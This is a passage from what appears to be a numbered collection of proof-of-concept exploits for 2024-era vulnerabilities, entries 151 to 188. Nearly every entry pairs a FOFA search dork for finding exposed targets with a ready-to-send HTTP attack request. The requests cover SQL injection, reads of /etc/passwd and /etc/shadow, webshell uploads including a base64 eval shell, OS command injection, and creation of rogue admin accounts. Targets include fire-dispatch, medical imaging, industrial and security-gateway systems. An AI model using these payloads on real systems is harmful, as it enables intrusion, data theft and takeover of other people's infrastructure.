{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the temporary file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
Affected devices:
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

Raw request (mdc decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt;):
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. Meite CRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The uploaded file is then reachable at:
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT (英飞达) PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

bufValue is the base64-encoded source of a JScript .NET web service whose Cmdshell method eval()s its Pass parameter; after the upload it is invoked at:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal / file read
CVE-2024-4956 (fixed in Nexus Repository 3.68.1)
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name (a relative path is accepted as-is) and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the file written to the web root:
http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The client-controlled remotePath decides where the file lands; it is then served at:
http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Huixiaoyuan/Anxiaoyi (慧校园/安校易) campus management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The server stores the upload under a fixed name:
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL (abbreviated in the source; the injection is in the sortOrder parameter):
https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
Error-based (MSSQL): the CHAR() concatenation spells "hello", which is reflected in the type-conversion error when the injection works.
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. LVS lean value management system (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing (宏景) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing (宏景) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
Time-based (MSSQL WAITFOR DELAY); the /templates/attestation/../../ prefix in the path reaches the endpoint without authentication.
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle GPS monitoring platform SQL injection
FOFA:body="/808gps/"
Time-based (MySQL SLEEP); the ";downloadLogger.action" path-parameter suffix is part of the PoC as published.
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD licence-plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
Send the request raw (a browser or proxy will normalise the "../" segments away before they reach the device).
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe (金和) OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
Time-based (MSSQL WAITFOR DELAY).
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
The configuration file is fetched by model name through a "../" prefix in front of the login page (no FOFA dork given in the source):
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
The %2e%2e segment is an encoded "..": the upload handler is reached through a path that the access control in front of /imc/primepush/ does not cover. Note that the file name comes from the part's name attribute, not from filename.
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Verify with:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen (建文) engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
Error-based (MySQL updatexml): the result of select user() is returned inside the XPath error message.
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
Time-based (MSSQL WAITFOR DELAY).
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
Error-based (Oracle ctxsys.drithsx.sn); the same endpoint changes the password of the user named in loginid, so test against a throwaway account.
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶) X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
The request body is a raw INSERT statement that the AddUser endpoint executes as-is; PURVIEW '4' is the privilege level the PoC assigns to the new account.
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor Tianyi (瑞友天翼) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
Stacked query with INTO OUTFILE: the unhex() literal decodes to <?php echo md5("1"); $file = __FILE__; unlink($file); and is written to WebRoot\plom.xgi.
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system used in photovoltaic power plants.
FOFA:title=="DataCube3"
Heavy-query time-based (SQLite RANDOMBLOB): the response is delayed while the 250 MB blob is hex-encoded.
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640 (same endpoint as entry 158; time-based variant)
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi JiaHui (叁体-佳会) video conferencing system attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
